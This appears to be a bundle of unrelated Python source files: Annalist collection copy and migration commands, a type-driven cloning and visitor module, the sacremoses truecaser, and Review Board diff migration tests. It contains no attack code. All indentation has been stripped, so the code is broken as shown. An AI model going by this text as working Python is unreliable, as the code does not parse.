coll = site.add_collection(coll_id, coll_metadata)
msgs = initialize_coll_data(src_dir, coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_INSTALLCOLLFAIL
return status
def am_copycollection(annroot, userhome, options):
"""
Copy collection data
annalist_manager copycollection old_coll_id new_coll_id
Copies data from an existing collection to a new collection.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
if len(options.args) > 2:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
old_coll_id = getargvalue(getarg(options.args, 0), "Old collection Id: ")
old_coll = Collection.load(site, old_coll_id)
if not (old_coll and old_coll.get_values()):
print("Old collection not found: %s"%(old_coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
new_coll_id = getargvalue(getarg(options.args, 1), "New collection Id: ")
new_coll = Collection.load(site, new_coll_id)
if (new_coll and new_coll.get_values()):
print("New collection already exists: %s"%(new_coll_id), file=sys.stderr)
return am_errors.AM_COLLECTIONEXISTS
# Copy collection now
print("Copying collection '%s' to '%s'"%(old_coll_id, new_coll_id))
new_coll = site.add_collection(new_coll_id, old_coll.get_values())
msgs = copy_coll_data(old_coll, new_coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_COPYCOLLFAIL
print("")
return status
def am_check_site_updated(coll):
"""
Check that site data has ben updated before perfoprming data migration.
Data migraton is performed incompletely if the "_field" type is not visible, so
that is the test used here.
"""
if layout.FIELD_TYPEID in coll._children(RecordType, altscope="all"):
return am_errors.AM_SUCCESS
print("Perform 'annalist-manager updatesitedata' before collection data migration.")
print("Collection data not migrated.")
return am_errors.AM_MIGRATECOLLFAIL
def am_migratecollection(annroot, userhome, options):
"""
Apply migrations for a specified collection
annalist_manager migratecollection coll
Reads and writes every entity in a collection, thereby applying data
migrations and saving them in the stored data.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
coll_id = getargvalue(getarg(options.args, 0), "Collection Id: ")
coll = Collection.load(site, coll_id)
if not (coll and coll.get_values()):
print("Collection not found: %s"%(coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
status = am_check_site_updated(coll)
if status != am_errors.AM_SUCCESS:
return status
print("Apply data migrations in collection '%s'"%(coll_id,))
msgs = migrate_coll_data(coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_MIGRATECOLLFAIL
else:
coll.update_software_compatibility_version()
return status
def am_migrateallcollections(annroot, userhome, options):
"""
Apply migrations to all collections
annalist_manager migrateallcollections
Reads and writes every entity in all collections, thereby
applying data migrations and saving them in the stored data.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
print("Apply data migrations in all collections:")
for coll in site.collections():
status = am_check_site_updated(coll)
if status != am_errors.AM_SUCCESS:
return status
coll_id = coll.get_id()
if coll_id != layout.SITEDATA_ID:
log.debug("========== Processing '%s' =========="%(coll_id,))
print("---- Processing '%s'"%(coll_id,))
msgs = migrate_coll_data(coll)
if msgs:
for msg in msgs:
print(msg)
status = am_errors.AM_MIGRATECOLLFAIL
print("Data migrations complete.")
return status
# End.
|
|
from base import *
from globs import *
from types_builtin import app_map, subst
# Sure could use graphs here!
VatContents = DT('VatContents', ('copiedExtrinsics', ['*Extrinsic']),
('replacements', {'a': 'a'}),
('transmute', {'a': 'a'}))
VAT = new_env('VAT', VatContents)
Original = new_extrinsic('Original', 'a')
def set_orig(clone, orig):
# Don't need to recurse since there's only one level of clones
if has_extrinsic(Original, orig):
orig = extrinsic(Original, orig)
add_extrinsic(Original, clone, orig)
def orig_loc(obj):
# Ugh, I don't like the conditional check...
if has_extrinsic(Original, obj):
obj = extrinsic(Original, obj)
return extrinsic(Location, obj)
def original(extr, obj):
return extrinsic(extr, extrinsic(Original, obj))
def original_has(extr, obj):
if not has_extrinsic(Original, obj):
return False
return has_extrinsic(extr, extrinsic(Original, obj))
def in_vat(func):
return in_env(VAT, VatContents([], {}, False), func)
# Clone structured data, recording information about its clone in the vat
def clone(src, extrinsics):
env(VAT).copiedExtrinsics = extrinsics
return clone_structured(src)
def clone_structured(src, apps=None):
ctor = instance_ctor(src)
fs = []
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = field.type
if apps:
ft = subst(apps, ft)
fs.append(clone_by_type(getattr(src, fnm), ft))
ctor_cls = extrinsic(TrueRepresentation, ctor)
vat = env(VAT)
if vat.transmute:
destData = vat.transmute.get(extrinsic(FormSpec, SUPERS[ctor_cls]))
if destData is not None:
ctor = transmuted_ctor(src, destData)
ctor_cls = extrinsic(TrueRepresentation, ctor)
o = ctor_cls(*fs)
for extr in vat.copiedExtrinsics:
if has_extrinsic(extr, src):
add_extrinsic(extr, o, extrinsic(extr, src))
if in_extrinsic_scope(Original):
set_orig(o, src)
vat.replacements[src] = o
return o
def clone_by_type(src, t):
cls = t.__class__
if cls is TVar:
assert isinstance(Structured, src), \
"Can't clone unstructured %r without type info" % (src,)
return clone_structured(src)
elif cls in (TPrim, TFunc, TWeak):
return src
elif cls is TTuple:
assert isinstance(src, tuple)
return tuple(clone_by_type(v, tt) for v, tt in ezip(src, t.tupleTypes))
elif cls is TData:
assert isinstance(src, extrinsic(TrueRepresentation, t.data)), \
"Expected %s, got: %r" % (t.data, obj)
apps = t.appTypes and app_map(t.data, t.appTypes)
return clone_structured(src, apps)
elif cls is TArray:
assert isinstance(src, list)
return [clone_by_type(s, t.elemType) for s in src]
else:
assert False, "Bad type to clone: %r" % (t,)
def instance_ctor(obj):
ctors = t_DT(type(obj)).data.ctors
return ctors[obj._ctor_ix if len(ctors) > 1 else 0]
def transmuted_ctor(obj, destData):
ctors = destData.ctors
ix = obj._ctor_ix if len(ctors) > 1 else 0
assert ix < len(ctors), "Don't know how to transmute %s!" % (obj,)
return ctors[ix]
# Update an object's weak references to point at new clones from this vat
def rewrite(obj):
return rewrite_by_type(obj, t_DT(type(obj)))
def rewrite_by_type(obj, t):
cls = t.__class__
if cls is TVar:
assert isinstance(Structured, obj), \
"Can't rewrite unstructured %r without type info" % (obj,)
rewrite_by_type(obj, t_DT(type(obj)))
elif cls in (TPrim, TFunc):
pass
elif cls is TTuple:
assert isinstance(obj, tuple)
for v, tt in ezip(obj, t.tupleTypes):
assert not isinstance(tt, TWeak), "TODO"
rewrite_by_type(v, tt)
elif cls is TData:
assert isinstance(obj, extrinsic(TrueRepresentation, t.data)), \
"Expected %s, found %s %s" % (t.data, type(obj), obj)
apps = t.appTypes and app_map(t.data, t.appTypes)
ctor = instance_ctor(obj)
repls = env(VAT).replacements
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = field.type
if apps:
ft = subst(apps, ft)
val = getattr(obj, fnm)
if isinstance(ft, TWeak):
if val in repls:
setattr(obj, fnm, repls[val])
else:
rewrite_by_type(val, ft)
elif cls is TArray:
et = t.elemType
assert isinstance(obj, list)
if isinstance(et, TWeak):
repls = env(VAT).replacements
for i, w in enumerate(obj):
if w in repls:
obj[i] = repls[w]
else:
for s in obj:
rewrite_by_type(s, et)
elif cls is TWeak:
assert False, "Shouldn't get here (should be rewritten in other cases)"
else:
assert False, "Bad type to rewrite: %r" % (t,)
# Clone a structured object, changing its type in the process
def transmute(obj, mapping, extrinsics):
vat = env(VAT)
vat.copiedExtrinsics = extrinsics
vat.transmute = dict((src.data, dest.data)
for src, dest in mapping.iteritems())
obj = clone_structured(obj)
vat.transmute = False
return obj
# AST visitor&mutator (not really vat)
# Env+class is redundant; could just put this all in the class.
# But this is plumbing anyway
VISIT = new_env('VISIT', None)
def visit(visitor, obj, t):
inst = visitor()
inst.obj = inst.t = inst.fts = None
if isinstance(t, basestring):
t = parse_type(t)
in_env(VISIT, inst, lambda: visit_by_type(obj, t))
class Visitor(object):
def visit(self, *path):
obj, t = self.obj, self.t
for field in path:
if isinstance(field, int):
assert isinstance(t, TArray), "Can't index %s" % (t,)
obj = obj[field]
t = t.elemType
continue
assert field in self.fts, \
"%s is not a field {%s}" % (field, ', '.join(self.fts))
t = self.fts[field]
# Catch some stupidity
if len(path) == 1:
assert t is not None, "Already visited this field!"
self.fts[field] = None
assert not isinstance(t, TWeak), \
"%s is weak and won't be visited" % (field,)
obj = getattr(obj, field)
return visit_by_type(obj, t, bool(path))
def visit_by_type(obj, t, customVisitors=True):
cls = t.__class__
if cls in (TVar, TPrim, TFunc, TWeak):
pass
elif cls is TTuple:
assert isinstance(obj, tuple)
for v, tt in ezip(obj, t.tupleTypes):
visit_by_type(v, tt)
elif cls is TData:
data = t.data
assert isinstance(obj, extrinsic(TrueRepresentation, data)), \
"Expected %s, got %s %s" % (data, type(obj), obj)
apps = t.appTypes and app_map(data, t.appTypes)
visitor = env(VISIT)
ctor = extrinsic(FormSpec, type(obj))
fts = dict((extrinsic(Name, f), subst(apps,f.type) if apps else f.type)
for f in ctor.fields)
if customVisitors:
custom = getattr(visitor, extrinsic(Name, ctor), None)
if custom is None:
custom = getattr(visitor, 't_'+extrinsic(Name, data), None)
if custom is not None:
# Scope field types for recursive visiting
old = visitor.obj, visitor.t, visitor.fts
visitor.obj, visitor.t, visitor.fts = obj, t, fts
custom(obj)
visitor.obj, visitor.t, visitor.fts = old
return
# Default to recursive visits
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = fts[fnm]
if not isinstance(ft, TWeak):
visit_by_type(getattr(obj, fnm), ft)
elif cls is TArray:
assert isinstance(obj, list)
if not isinstance(t.elemType, TWeak):
for o in obj:
visit_by_type(o, t.elemType)
else:
assert False, "Bad type to visit: %r" % (t,)
MUTATE = new_env('MUTATE', None)
def mutate(mutator, obj, t):
inst = mutator()
inst.obj = inst.t = inst.fts = None
if isinstance(t, basestring):
t = parse_type(t)
return in_env(MUTATE, inst, lambda: mutate_by_type(obj, t))
class Mutator(object):
def mutate(self, *path):
obj, t = self.obj, self.t
for field in path:
if isinstance(field, int):
assert isinstance(t, TArray), "Can't index %s" % (t,)
obj = obj[field]
t = t.elemType
continue
assert field in self.fts, \
"%s is not a field {%s}" % (field, ', '.join(self.fts))
t = self.fts[field]
# Catch some stupidity
if len(path) == 1:
assert t is not None, "Already mutated this field!"
self.fts[field] = None
assert not isinstance(t, TWeak), \
"%s is weak and won't be mutated" % (field,)
obj = getattr(obj, field)
return mutate_by_type(obj, t, bool(path))
def mutate_by_type(obj, t, customMutators=True):
cls = t.__class__
if cls in (TVar, TPrim, TFunc, TWeak):
return obj
elif cls is TTuple:
assert isinstance(obj, tuple)
return tuple(rewrite_by_type(v, tt)
for v, tt in ezip(obj, t.tupleTypes))
elif cls is TData:
data = t.data
assert isinstance(obj, extrinsic(TrueRepresentation, data)), \
"Expected %s, got %r: %r" % (data, type(obj), obj)
apps = t.appTypes and app_map(data, t.appTypes)
mutator = env(MUTATE)
ctor = extrinsic(FormSpec, type(obj))
fts = dict((extrinsic(Name, f), subst(apps,f.type) if apps else f.type)
for f in ctor.fields)
if customMutators:
custom = getattr(mutator, extrinsic(Name, ctor), None)
if custom is None:
custom = getattr(mutator, 't_'+extrinsic(Name, data), None)
if custom is not None:
# Scope field types for recursive mutatino
old = mutator.obj, mutator.t, mutator.fts
mutator.obj, mutator.t, mutator.fts = obj, t, fts
obj = custom(obj)
mutator.obj, mutator.t, mutator.fts = old
return obj
# Default to recursive mutation
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = fts[fnm]
if not isinstance(ft, TWeak):
val = getattr(obj, fnm)
setattr(obj, fnm, mutate_by_type(val, ft))
return obj
elif cls is TArray:
et = t.elemType
assert isinstance(obj, list)
if isinstance(et, TWeak):
return obj
return [mutate_by_type(o, et) for o in obj]
else:
assert False, "Bad type to mutate: %r" % (t,)
# COMBINATORIAL EXPLOSIONS
REIFIED_MONOTYPES = {}
def cement_type(t):
key = type_key(t)
if key in CONCRETE_TYPES:
return CONCRETE_TYPES[key]
else:
assert False
def type_key(t):
m = match(t)
if m('TPrim(prim)'):
return prim_key(m.prim)
elif m('TData(dt, ts)'):
nm = extrinsic(Name, dt)
return '%s(%s)' % (nm, ', '.join(type_key(a) for a in m.ts))
elif m('TArray(t, _)'): # kind?
return '[%s]' % (type_key(m.t),)
elif m('TWeak(t)'):
return '*%s' % (type_key(m.t),)
elif m('TTuple(ts)'):
return 't(%s)' % (', '.join(type_key(t) for t in m.ts),)
elif m('TVar(tv)'):
return 'ax%x' % (id(tv),)
elif m('TFunc(ps, r, _)'):
ts = map(m.ps, type_key)
ts.append(match(m.r, ('Ret(t)', type_key),
('Void()', lambda: 'void'),
('Bottom()', lambda: 'bottom')))
return 'f(%s)' % (' -> '.join(ts),)
else:
assert False
def prim_key(p):
m = match(p)
if m('PInt()'): return 'int'
elif m('PFloat()'): return 'float'
elif m('PStr()'): return 'str'
elif m('PChar()'): return 'char'
elif m('PBool()'): return 'bool'
else: assert False
# vi: set sw=4 ts=4 sts=4 tw=79 ai et nocindent:
|
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import re
from collections import defaultdict, Counter
from functools import partial
from itertools import chain
from six import text_type
from sacremoses.corpus import Perluniprops
from sacremoses.corpus import NonbreakingPrefixes
from sacremoses.util import parallelize_preprocess, grouper
# Hack to enable Python2.7 to use encoding.
import sys
if sys.version_info[0] < 3:
import io
import warnings
open = io.open
warnings.warn(
str(
"You should really be using Python3!!! "
"Tick tock, tick tock, https://pythonclock.org/"
)
)
perluniprops = Perluniprops()
class MosesTruecaser(object):
"""
This is a Python port of the Moses Truecaser from
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/train-truecaser.perl
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecase.perl
"""
# Perl Unicode Properties character sets.
Lowercase_Letter = text_type("".join(perluniprops.chars("Lowercase_Letter")))
Uppercase_Letter = text_type("".join(perluniprops.chars("Uppercase_Letter")))
Titlecase_Letter = text_type("".join(perluniprops.chars("Uppercase_Letter")))
def __init__(self, load_from=None, is_asr=None, encoding="utf8"):
"""
:param load_from:
:type load_from:
:param is_asr: A flag to indicate that model is for ASR. ASR input has
no case, make sure it is lowercase, and make sure known are cased
eg. 'i' to be uppercased even if i is known.
:type is_asr: bool
"""
# Initialize the object.
super(MosesTruecaser, self).__init__()
# Initialize the language specific nonbreaking prefixes.
self.SKIP_LETTERS_REGEX = re.compile(
u"[{}{}{}]".format(
self.Lowercase_Letter, self.Uppercase_Letter, self.Titlecase_Letter
)
)
self.XML_SPLIT_REGX = re.compile("(<.*(?<=>))(.*)((?=</)[^>]*>)")
self.SENT_END = {".", ":", "?", "!"}
self.DELAYED_SENT_START = {
"(",
"[",
'"',
"'",
"'",
""",
"[",
"]",
}
self.encoding = encoding
self.is_asr = is_asr
if load_from:
self.model = self._load_model(load_from)
def learn_truecase_weights(self, tokens, possibly_use_first_token=False):
"""
This function checks through each tokens in a sentence and returns the
appropriate weight of each surface token form.
"""
# Keep track of first tokens in the sentence(s) of the line.
is_first_word = True
truecase_weights = []
for i, token in enumerate(tokens):
# Skip XML tags.
if re.search(r"(<\S[^>]*>)", token):
continue
# Skip if sentence start symbols.
elif token in self.DELAYED_SENT_START:
continue
# Resets the `is_first_word` after seeing sent end symbols.
if not is_first_word and token in self.SENT_END:
is_first_word = True
continue
# Skips tokens with nothing to case.
if not self.SKIP_LETTERS_REGEX.search(token):
is_first_word = False
continue
# If it's not the first word,
# then set the current word weight to 1.
current_word_weight = 0
if not is_first_word:
current_word_weight = 1
# Otherwise check whether user wants to optionally
# use the first word.
elif possibly_use_first_token:
# Gated special handling of first word of sentence.
# Check if first characer of token is lowercase.
if token[0].islower():
current_word_weight = 1
elif i == 1:
current_word_weight = 0.1
is_first_word = False
if current_word_weight > 0:
truecase_weights.append((token.lower(), token, current_word_weight))
return truecase_weights
def _train(
self,
document_iterator,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
:param document_iterator: The input document, each outer list is a sentence,
the inner list is the list of tokens for each sentence.
:type document_iterator: iter(list(str))
:param possibly_use_first_token: When True, on the basis that the first
word of a sentence is always capitalized; if this option is provided then:
a) if a sentence-initial token is *not* capitalized, then it is counted, and
b) if a capitalized sentence-initial token is the only token of the segment,
then it is counted, but with only 10% of the weight of a normal token.
:type possibly_use_first_token: bool
:returns: A dictionary of the best, known objects as values from `_casing_to_model()`
:rtype: {'best': dict, 'known': Counter}
"""
casing = defaultdict(Counter)
train_truecaser = partial(
self.learn_truecase_weights,
possibly_use_first_token=possibly_use_first_token,
)
token_weights = chain(
*parallelize_preprocess(
train_truecaser, document_iterator, processes, progress_bar=progress_bar
)
)
# Collect the token_weights from every sentence.
for lowercase_token, surface_token, weight in token_weights:
casing[lowercase_token][surface_token] += weight
# Save to file if specified.
if save_to:
self._save_model_from_casing(casing, save_to)
return self._casing_to_model(casing)
def train(
self,
documents,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
Default duck-type of _train(), accepts list(list(str)) as input documents.
"""
self.model = None # Clear the model first.
self.model = self._train(
documents,
save_to,
possibly_use_first_token,
processes,
progress_bar=progress_bar,
)
return self.model
def train_from_file(
self,
filename,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
Duck-type of _train(), accepts a filename to read as a `iter(list(str))`
object.
"""
with open(filename, encoding=self.encoding) as fin:
# document_iterator = map(str.split, fin.readlines())
document_iterator = (
line.split() for line in fin.readlines()
) # Lets try a generator comprehension for Python2...
self.model = None # Clear the model first.
self.model = self._train(
document_iterator,
save_to,
possibly_use_first_token,
processes,
progress_bar=progress_bar,
)
return self.model
def train_from_file_object(
self,
file_object,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
Duck-type of _train(), accepts a file object to read as a `iter(list(str))`
object.
"""
# document_iterator = map(str.split, file_object.readlines())
document_iterator = (
line.split() for line in file_object.readlines()
) # Lets try a generator comprehension for Python2...
self.model = None # Clear the model first.
self.model = self._train(
document_iterator,
save_to,
possibly_use_first_token,
processes,
progress_bar=progress_bar,
)
return self.model
def truecase(self, text, return_str=False, use_known=False):
"""
Truecase a single sentence / line of text.
:param text: A single string, i.e. sentence text.
:type text: str
:param use_known: Use the known case if a word is a known word but not the first word.
:type use_known: bool
"""
check_model_message = str(
"\nUse Truecaser.train() to train a model.\n"
"Or use Truecaser('modefile') to load a model."
)
assert hasattr(self, "model"), check_model_message
# Keep track of first tokens in the sentence(s) of the line.
is_first_word = True
truecased_tokens = []
tokens = self.split_xml(text)
# best_cases = best_cases if best_cases else self.model['best']
# known_cases = known_cases if known_cases else self.model['known']
for i, token in enumerate(tokens):
# Append XML tags and continue
if re.search(r"(<\S[^>]*>)", token):
truecased_tokens.append(token)
continue
# Note this shouldn't happen other if | are escaped as |
# To make the truecaser resilient,
# we'll just any token starting with pipes as they are.
if token == "|" or token.startswith("|"):
truecased_tokens.append(token)
continue
# Reads the word token and factors separatedly
token, other_factors = re.search(r"^([^\|]+)(.*)", token).groups()
# Lowercase the ASR tokens.
if self.is_asr:
token = token.lower()
# The actual case replacement happens here.
# "Most frequent" case of the word.
best_case = self.model["best"].get(token.lower(), None)
# Other known cases of the word.
known_case = self.model["known"].get(token, None)
# If it's the start of sentence.
if is_first_word and best_case: # Truecase sentence start.
token = best_case
elif known_case: # Don't change known tokens.
token = known_case if use_known else token
elif (
best_case
): # Truecase otherwise unknown tokens? Heh? From https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecase.perl#L66
token = best_case
# Else, it's an unknown word, don't change the word.
# Concat the truecased `word` with the `other_factors`
token = token + other_factors
# Adds the truecased word.
truecased_tokens.append(token)
# Resets sentence start if this token is an ending punctuation.
is_first_word = token in self.SENT_END
if token in self.DELAYED_SENT_START:
is_first_word = False
# return ' '.join(tokens)
return " ".join(truecased_tokens) if return_str else truecased_tokens
def truecase_file(self, filename, return_str=True):
with open(filename, encoding=self.encoding) as fin:
for line in fin:
truecased_tokens = self.truecase(line.strip())
# Yield the truecased line.
yield " ".join(truecased_tokens) if return_str else truecased_tokens
@staticmethod
def split_xml(line):
"""
Python port of split_xml function in Moses' truecaser:
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecaser.perl
:param line: Input string, should be tokenized, separated by space.
:type line: str
"""
line = line.strip()
tokens = []
while line:
# Assumes that xml tag is always separated by space.
has_xml = re.search(r"^\s*(<\S[^>]*>)(.*)$", line)
# non-XML test.
is_non_xml = re.search(r"^\s*([^\s<>]+)(.*)$", line)
# '<' or '>' occurs in word, but it's not an XML tag
xml_cognates = re.search(r"^\s*(\S+)(.*)$", line)
if has_xml:
potential_xml, line_next = has_xml.groups()
# exception for factor that is an XML tag
if (
re.search(r"^\S", line)
and len(tokens) > 0
and re.search(r"\|$", tokens[-1])
):
tokens[-1] += potential_xml
# If it's a token with factors, join with the previous token.
is_factor = re.search(r"^(\|+)(.*)$", line_next)
if is_factor:
tokens[-1] += is_factor.group(1)
line_next = is_factor.group(2)
else:
tokens.append(
potential_xml + " "
) # Token hack, unique to sacremoses.
line = line_next
elif is_non_xml:
tokens.append(is_non_xml.group(1)) # Token hack, unique to sacremoses.
line = is_non_xml.group(2)
elif xml_cognates:
tokens.append(
xml_cognates.group(1)
) # Token hack, unique to sacremoses.
line = xml_cognates.group(2)
else:
raise Exception("ERROR: huh? {}".format(line))
tokens[-1] = tokens[-1].strip() # Token hack, unique to sacremoses.
return tokens
def _casing_to_model(self, casing):
"""
:returns: A tuple of the (best, known) objects.
:rtype: tuple(dict, Counter)
"""
best = {}
known = Counter()
for token_lower in casing:
tokens = casing[token_lower].most_common()
# Set the most frequent case as the "best" case.
best[token_lower] = tokens[0][0]
# If it's asr, throw away everything
if not self.is_asr:
for token, count in tokens[1:]:
# Note: This is rather odd that the counts are thrown away...
# from https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecase.perl#L34
known[token] += 1
model = {"best": best, "known": known, "casing": casing}
return model
def save_model(self, filename):
self._save_model_from_casing(self.model["casing"], filename)
def _save_model_from_casing(self, casing, filename):
"""
Outputs the truecaser model file in the same output format as
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/train-truecaser.perl
:param casing: The dictionary of tokens counter from `train()`.
:type casing: default(Counter)
"""
with open(filename, "w", encoding=self.encoding) as fout:
for token in casing:
total_token_count = sum(casing[token].values())
tokens_counts = []
for i, (token, count) in enumerate(casing[token].most_common()):
if i == 0:
out_token = "{} ({}/{})".format(token, count, total_token_count)
else:
out_token = "{} ({})".format(token, count, total_token_count)
tokens_counts.append(out_token)
print(" ".join(tokens_counts), end="\n", file=fout)
def _load_model(self, filename):
"""
Loads pre-trained truecasing file.
:returns: A dictionary of the best, known objects as values from `_casing_to_model()`
:rtype: {'best': dict, 'known': Counter}
"""
casing = defaultdict(Counter)
with open(filename, encoding=self.encoding) as fin:
for line in fin:
line = line.strip().split()
for token, count in grouper(line, 2):
count = count.split("/")[0].strip("()")
casing[token.lower()][token] = int(count)
# Returns the best and known object from `_casing_to_model()`
return self._casing_to_model(casing)
class MosesDetruecaser(object):
def __init__(self):
# Initialize the object.
super(MosesDetruecaser, self).__init__()
self.SENT_END = {".", ":", "?", "!"}
self.DELAYED_SENT_START = {
"(",
"[",
'"',
"'",
"'",
""",
"[",
"]",
}
# Some predefined tokens that will always be in lowercase.
self.ALWAYS_LOWER = {
"a",
"after",
"against",
"al-.+",
"and",
"any",
"as",
"at",
"be",
"because",
"between",
"by",
"during",
"el-.+",
"for",
"from",
"his",
"in",
"is",
"its",
"last",
"not",
"of",
"off",
"on",
"than",
"the",
"their",
"this",
"to",
"was",
"were",
"which",
"will",
"with",
}
def detruecase(self, text, is_headline=False, return_str=False):
"""
Detruecase the translated files from a model that learnt from truecased
tokens.
:param text: A single string, i.e. sentence text.
:type text: str
"""
# `cased_tokens` keep tracks of detruecased tokens.
cased_tokens = []
sentence_start = True
# Capitalize token if it's at the sentence start.
for token in text.split():
token = token[:1].upper() + token[1:] if sentence_start else token
cased_tokens.append(token)
if token in self.SENT_END:
sentence_start = True
elif not token in self.DELAYED_SENT_START:
sentence_start = False
# Check if it's a headline, if so then use title case.
if is_headline:
cased_tokens = [
token if token in self.ALWAYS_LOWER else token[:1].upper() + token[1:]
for token in cased_tokens
]
return " ".join(cased_tokens) if return_str else cased_tokens
__all__ = ["MosesTruecaser", "MosesDetruecaser"]
|
|
from __future__ import unicode_literals
from djblets.db.fields import Base64DecodedValue
from reviewboard.diffviewer.models import (DiffSet, FileDiff,
LegacyFileDiffData,
RawFileDiffData)
from reviewboard.testing import TestCase
class FileDiffMigrationTests(TestCase):
"""Unit tests for FileDiff migration."""
fixtures = ['test_scmtools']
def setUp(self):
super(FileDiffMigrationTests, self).setUp()
self.repository = self.create_repository(tool_name='Test')
diffset = DiffSet.objects.create(name='test',
revision=1,
repository=self.repository)
self.filediff = FileDiff(source_file='README',
dest_file='README',
diffset=diffset,
diff64=b'',
parent_diff64=b'')
self.parent_diff = (
b'diff --git a/README b/README\n'
b'index 94bdd3e..3d2b777 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -2 +2 @@\n'
b'-blah..\n'
b'+blah blah\n'
)
repository = self.create_repository(tool_name='Test')
diffset = DiffSet.objects.create(name='test',
revision=1,
repository=repository)
self.filediff = FileDiff(source_file='README',
dest_file='README',
diffset=diffset,
diff64=b'',
parent_diff64=b'')
def test_migration_by_diff(self):
"""Testing RawFileDiffData migration accessing FileDiff.diff"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
self.assertIsNone(self.filediff.parent_diff_hash)
# This should prompt the migration.
diff = self.filediff.diff
self.assertIsNone(self.filediff.parent_diff_hash)
self.assertIsNotNone(self.filediff.diff_hash)
self.assertEqual(diff, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff64, b'')
self.assertEqual(self.filediff.diff_hash.binary,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff, diff)
self.assertIsNone(self.filediff.parent_diff)
self.assertIsNone(self.filediff.parent_diff_hash)
def test_migration_by_parent_diff(self):
"""Testing RawFileDiffData migration accessing FileDiff.parent_diff"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.filediff.parent_diff64 = self.parent_diff
self.assertIsNone(self.filediff.parent_diff_hash)
# This should prompt the migration.
parent_diff = self.filediff.parent_diff
self.assertIsNotNone(self.filediff.parent_diff_hash)
self.assertEqual(parent_diff, self.parent_diff)
self.assertEqual(self.filediff.parent_diff64, b'')
self.assertEqual(self.filediff.parent_diff_hash.binary,
self.parent_diff)
self.assertEqual(self.filediff.parent_diff, self.parent_diff)
def test_migration_by_delete_count(self):
"""Testing RawFileDiffData migration accessing FileDiff.delete_count"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
# This should prompt the migration.
counts = self.filediff.get_line_counts()
self.assertIsNotNone(self.filediff.diff_hash)
self.assertEqual(counts['raw_delete_count'], 1)
self.assertEqual(self.filediff.diff_hash.delete_count, 1)
def test_migration_by_insert_count(self):
"""Testing RawFileDiffData migration accessing FileDiff.insert_count"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
# This should prompt the migration.
counts = self.filediff.get_line_counts()
self.assertIsNotNone(self.filediff.diff_hash)
self.assertEqual(counts['raw_insert_count'], 1)
self.assertEqual(self.filediff.diff_hash.insert_count, 1)
def test_migration_by_set_line_counts(self):
"""Testing RawFileDiffData migration calling FileDiff.set_line_counts
"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
# This should prompt the migration, but with our line counts.
self.filediff.set_line_counts(raw_insert_count=10,
raw_delete_count=20)
self.assertIsNotNone(self.filediff.diff_hash)
counts = self.filediff.get_line_counts()
self.assertEqual(counts['raw_insert_count'], 10)
self.assertEqual(counts['raw_delete_count'], 20)
self.assertEqual(self.filediff.diff_hash.insert_count, 10)
self.assertEqual(self.filediff.diff_hash.delete_count, 20)
def test_migration_by_legacy_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.diff
with associated LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.DEFAULT_GIT_FILEDIFF_DATA_DIFF))
self.filediff.legacy_diff_hash = legacy
self.filediff.save()
# This should prompt the migration.
diff = self.filediff.diff
self.assertIsNotNone(self.filediff.diff_hash)
self.assertIsNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_diff_hash)
self.assertEqual(LegacyFileDiffData.objects.count(), 0)
self.assertEqual(diff, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff64, b'')
self.assertEqual(self.filediff.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff, diff)
